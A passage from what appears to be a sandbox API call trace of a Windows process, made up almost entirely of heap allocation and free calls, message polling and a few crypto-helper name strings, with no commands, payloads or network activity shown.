Flags=0x0, Size=0x8) returned 0x9c2628 [0184.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0184.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xdf62) returned 0xa5f008 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0184.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0184.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.936] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0184.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0184.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2718 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0184.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0184.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.937] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0184.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.937] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.938] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0184.939] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0184.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.939] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0184.940] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0184.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0184.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0184.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: 